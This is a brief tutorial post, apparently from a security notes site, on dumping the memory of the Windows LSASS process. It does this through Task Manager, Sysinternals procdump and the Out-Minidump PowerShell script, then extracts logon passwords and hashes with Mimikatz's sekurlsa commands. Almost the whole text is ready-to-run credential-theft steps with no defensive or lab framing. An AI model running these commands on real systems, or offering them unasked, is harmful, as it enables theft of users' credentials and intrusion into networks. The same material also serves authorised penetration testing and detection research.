Home LSASS Dumping
Post
Cancel

LSASS Dumping

Create a dump file of lsass process using multiple different techniques.

  1. Task Manager
  2. Procdump
  3. Minidump
  4. Extract Passwords/Hashes with Mimikatz


Task Manager

Create Dump File

  1. Open Task Manger and locate the LSASS process.
  2. It will be called lsass.exe or Local Security Authority Process.
  3. Right click on the process and select Create dump file.


Procdump

Download Tools

Download Sysinternals Suite from Microsoft here.

Dump LSASS

Run the following command in an Admin command prompt:

1
procdump64.exe -ma lsass.exe lsass.dmp


Minidump

Download Minidump

Download the required script from Github here, or a local copy can be found here.

Import & Run Minidump

Import Minidump module:

1
Import-module .\Out-Minidump.ps1

Run the module and dump the process:

1
Get-Process lsass | Out-Minidump


Extract Passwords/Hashes with Mimikatz

Download Mimikatz from GitHub here.

Open mimikatz.exe and run:

1
2
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
This post is licensed under CC BY 4.0 by the author.